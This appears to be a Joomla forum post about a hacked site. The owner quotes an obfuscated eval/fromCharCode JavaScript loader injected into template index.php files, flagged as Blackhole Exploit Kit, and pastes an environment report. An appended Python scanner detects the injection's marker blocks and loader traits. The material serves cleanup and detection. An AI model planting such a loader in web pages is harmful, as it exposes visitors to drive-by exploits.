Today I got a call from a friend whose website I made a short time ago; she gets an error message from AVG saying that a threat was blocked.
I visited the website with an empty sandbox and different browsers, but no such message appeared on any of my PCs (Win7 x64 / Win XP), neither from AVG, which I installed to test, nor from any other virus or malware scanner (Avira, SUPERAntispyware, Malwarebytes).
AVG wrote:
File name: domain.tld/index.php
Threat name: Exploit Blackhole Eploit Kit (type 2704)
The scan report from virustotal.com was also fine. The only suspicious thing is the scan from Wepawet, which shows a request to about:blank and to h$$$://w$$.people-search-global.c$$/clicker.php (censored to avoid accidental clicking). Link to report
So I had a further look and found a JS snippet in every template's index.php file:
Code:
<?
#0c0896#
echo " <script type=\"text/javascript\" language=\"javascript\" > ps=\"split\";e=eval;v=\"0x\";a=0;z=\"y\";try{a*=25}catch(zz){a=1}if(!a){try{--e(\"doc\"+\"ument\")[\"\x62od\"+z]}catch(q){a2=\"_\";sa=0xa-02;}z=3_15_12_15_12__12_85_15_12_85_15_12\"[ps](a2);za=\"\";for(i=0;i<z.length;i++){za+=String[\"fromCharCode\"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}</script>";
#/0c0896#
?>
I've replaced all the index.php files with the original installation file. I'm only using a slightly changed (CSS, PHP) protostar template for the website, no 3rd party templates.
I have not found any suspicious files with jamss.php (scanned after I replaced the templates' index.php files).
I also had a look at the database, but I couldn't find anything out of the ordinary there.
And here is what FPA says:
Problem Description :: Forum Post Assistant (v1.2.3) : 24th June 2013 wrote:
Virus alert on website
Actions Taken To Resolve by Forum Post Assistant (v1.2.3) 24th June 2013 wrote:
See description above.
Of course I've changed all administrator passwords, the FTP password and the MySQL password.
Forum Post Assistant (v1.2.3) : 24th June 2013 wrote:
Basic Environment :: wrote:
Joomla! Instance :: Joomla! 3.1.1-Stable (Ember) 26-April-2013
Joomla! Platform :: Joomla Platform 12.2.0-Stable (Neil Armstrong) 21-September-2012
Joomla! Configured :: Yes | Writable (644) | Owner: zursonnenuhr (uid: 1/gid: 1) | Group: site520 (gid: 1) | Valid For: 3.1
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes
Host Configuration :: OS: Linux | OS Version: 2.6.18-348.3.1.el5PAE | Technology: i686 | Web Server: Apache | Encoding: gzip, deflate | Doc Root: /home/.sites/315/site520/web | System TMP Writable: No
PHP Configuration :: Version: 5.3.21 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 30711 | Log Errors To: /var/log/httpd/php.log | Last Known Error: | Register Globals: 0 | Magic Quotes: | Safe Mode: | Open Base: /home/.sites/315/site520/web:/home/.sites/315/site520/tmp:/usr/share/pear | Uploads: 1 | Max. Upload Size: 40M | Max. POST Size: 50M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 55M
MySQL Configuration :: Version: 5.1.67 (Client:mysqlnd 5.0.8-dev - 20102224 - $Id: 65fe78e70ce53d27a6cd578597722950e490b0d0 $) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 1014.11 KiB | #of Tables: 67
Detailed Environment :: wrote:
PHP Extensions :: Core (5.3.21) | date (5.3.21) | ereg () | libxml () | openssl () | pcre () | sqlite3 (0.7-dev) | zlib (1.1) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | hash (1.0) | fileinfo (1.0.5-dev) | filter (0.11.0) | ftp () | gd () | gettext () | SPL (0.2) | iconv () | session () | intl (1.1.0) | json (1.2.1) | mbstring () | mcrypt () | standard (5.3.21) | mysqlnd (mysqlnd 5.0.8-dev - 20102224 - $Id: 65fe78e70ce53d27a6cd578597722950e490b0d0 $) | mysqli (0.1) | mysql (1.0) | PDO (1.0.4dev) | pdo_mysql (1.0.2) | pdo_sqlite (1.0.1) | Phar (2.0.1) | posix () | Reflection ($Id: 4af6c4c676864b1c0bfa693845af0688645c37cf $) | imap () | SimpleXML (0.1) | soap () | sockets () | SQLite (2.0-dev) | exif (1.4 $Id$) | suhosin (0.9.33) | tokenizer (0.1) | xml () | xmlreader (0.1) | xmlrpc (0.51) | xmlwriter (0.1) | xsl (0.1) | zip (1.11.0) | cgi-fcgi () | mhash () | Zend Engine (2.3.0) |
Potential Missing Extensions ::
Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: No | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions :: wrote:
Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |
Elevated Permissions (First 10) :: error/ (775) |
Extensions Discovered :: wrote:
Components :: SITE :: com_mailto (3.0.0) | com_wrapper (3.0.0) |
Components :: ADMIN :: com_easybookreloaded (3-1) | com_media (3.0.0) | com_checkin (3.0.0) | com_search (3.0.0) | com_installer (3.0.0) | com_content (3.0.0) | com_plugins (3.0.0) | com_redirect (3.0.0) | com_categories (3.0.0) | com_config (3.0.0) | com_tags (3.1.0) | com_weblinks (3.0.0) | com_login (3.0.0) | com_messages (3.0.0) | com_cache (3.0.0) | com_users (3.0.0) | com_admin (3.0.0) | com_cpanel (3.0.0) | com_finder (3.0.0) | com_menus (3.0.0) | com_banners (3.0.0) | com_templates (3.0.0) | com_newsfeeds (3.0.0) | com_modules (3.0.0) | com_joomlaupdate (3.0.0) | com_languages (3.0.0) |
Modules :: SITE :: mod_random_image (3.0.0) | mod_wrapper (3.0.0) | mod_articles_category (3.0.0) | mod_stats (3.0.0) | mod_articles_popular (3.0.0) | mod_related_items (3.0.0) | mod_login (3.0.0) | mod_languages (3.0.0) | mod_weblinks (3.0.0) | mod_tags_similar (3.1.0) | mod_tags_popular (3.1.0) | mod_articles_news (3.0.0) | mod_articles_archive (3.0.0) | mod_feed (3.0.0) | mod_articles_latest (3.0.0) | mod_users_latest (3.0.0) | mod_syndicate (3.0.0) | mod_breadcrumbs (3.0.0) | mod_finder (3.0.0) | mod_whosonline (3.0.0) | mod_menu (3.0.0) | mod_footer (3.0.0) | mod_search (3.0.0) | mod_custom (3.0.0) | mod_banners (3.0.0) | mod_articles_categories (3.0.0) |
Modules :: ADMIN :: mod_stats_admin (3.0.0) | mod_status (3.0.0) | mod_login (3.0.0) | mod_title (3.0.0) | mod_toolbar (3.0.0) | mod_quickicon (3.0.0) | mod_feed (3.0.0) | mod_submenu (3.0.0) | mod_popular (3.0.0) | mod_menu (3.0.0) | mod_logged (3.0.0) | mod_custom (3.0.0) | mod_multilangstatus (3.0.0) | mod_latest (3.0.0) | mod_version (3.0.0) |
Plugins :: SITE :: PLG_CONTENT_SIGE (3-1) | plg_content_pagebreak (3.0.0) | plg_content_finder (3.0.0) | plg_content_pagenavigation (3.0.0) | plg_content_vote (3.0.0) | plg_content_emailcloak (3.0.0) | plg_content_joomla (3.0.0) | plg_content_loadmodule (3.0.0) | plg_quickicon_joomlaupdate (3.0.0) | plg_quickicon_extensionupdate (3.0.0) | plg_editors_codemirror (1.0) | plg_editors_tinymce (3.5.6) | plg_system_sef (3.0.0) | plg_system_remember (3.0.0) | plg_system_languagecode (3.0.0) | plg_system_cache (3.0.0) | plg_system_p3p (3.0.0) | plg_system_logout (3.0.0) | plg_system_redirect (3.0.0) | plg_system_highlight (3.0.0) | plg_system_languagefilter (3.0.0) | plg_system_debug (3.0.0) | plg_system_log (3.0.0) | plg_finder_content (3.0.0) | plg_finder_contacts (3.0.0) | plg_finder_newsfeeds (3.0.0) | plg_finder_categories (3.0.0) | plg_finder_tags (3.0.0) | plg_finder_weblinks (3.0.0) | plg_extension_joomla (3.0.0) | plg_editors-xtd_pagebreak (3.0.0) | plg_editors-xtd_readmore (3.0.0) | plg_editors-xtd_image (3.0.0) | plg_editors-xtd_article (3.0.0) | plg_authentication_joomla (3.0.0) | plg_authentication_gmail (3.0.0) | plg_authentication_ldap (3.0.0) | plg_search_content (3.0.0) | plg_search_contacts (3.0.0) | plg_search_newsfeeds (3.0.0) | plg_search_categories (3.0.0) | plg_search_weblinks (3.0.0) | plg_captcha_recaptcha (3.0.0) | plg_user_contactcreator (3.0.0) | plg_user_profile (3.0.0) | plg_user_joomla (3.0.0) |
Templates Discovered :: wrote:
Templates :: SITE :: beez3 (3.1.0) | protostar (1.0) | protostar (1.0) |
Templates :: ADMIN :: hathor (3.0.0) | isis (1.0) |
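One way to hunt for this kind of injection across a whole Joomla install, as an added example that is not code from the post or from Joomla: it looks for the hex marker pair that wrapped the script in the template index.php files and records which loader traits (eval alias, "0x" hex decoding, String.fromCharCode, a <script> emitted via echo) appear inside the block. The scan_source/scan_tree helpers and the sample files are constructed here; the infected sample uses a harmless stand-in, not the real payload.

```python
import re
from pathlib import Path

# Injected blocks in the post were wrapped in a marker pair such as
# "#0c0896#" ... "#/0c0896#"; a hex tag at the start must be closed by "#/<tag>#".
MARKER_RE = re.compile(r"#([0-9a-f]{6})#(.*?)#/\1#", re.DOTALL)

# Traits of the obfuscated loader seen in the post: an eval alias, "0x" hex
# parsing, String.fromCharCode decoding, and a <script> emitted via PHP echo.
TRAITS = {
    "script_tag": re.compile(r"<script\b", re.I),
    "eval_alias": re.compile(r"\beval\b"),
    "fromcharcode": re.compile(r"fromCharCode"),
    "hex_prefix": re.compile(r"[\"']0x"),
    "echo_js": re.compile(r"\becho\s+[\"'].*?<script", re.I | re.DOTALL),
}

def scan_source(text):
    """Return one finding per marker block: marker tag, line number, traits hit."""
    findings = []
    for m in MARKER_RE.finditer(text):
        block = m.group(2)
        hits = sorted(name for name, rx in TRAITS.items() if rx.search(block))
        line = text.count("\n", 0, m.start()) + 1
        findings.append({"marker": m.group(1), "line": line, "traits": hits})
    return findings

def scan_tree(root, filename="index.php"):
    """Walk a Joomla install and report every index.php carrying a marker block."""
    report = {}
    for path in Path(root).rglob(filename):
        if path.is_file():
            found = scan_source(path.read_text(errors="replace"))
            if found:
                report[str(path)] = found
    return report

# Constructed samples (not the post's real payload): one with a harmless
# stand-in for the loader inside the marker pair, one clean Protostar-style file.
SAMPLE_INFECTED = r'''<?php
#0c0896#
echo " <script type=\"text/javascript\"> e=eval;v=\"0x\";za=String[\"fromCharCode\"](e(v+\"41\"));e(za);</script>";
#/0c0896#
?>
<?php defined('_JEXEC') or die; ?>
'''
SAMPLE_CLEAN = "<?php\ndefined('_JEXEC') or die;\n$doc->addScript('/media/jui/js/jquery.min.js');\n"

if __name__ == "__main__":
    for name, src in (("infected", SAMPLE_INFECTED), ("clean", SAMPLE_CLEAN)):
        print(name, scan_source(src))
```

Run scan_tree against the web root (here /home/.sites/315/site520/web) to list every template index.php that still carries the marker pair; a file that has the traits but no marker pair will not be reported, so pair it with a diff against a pristine Joomla copy.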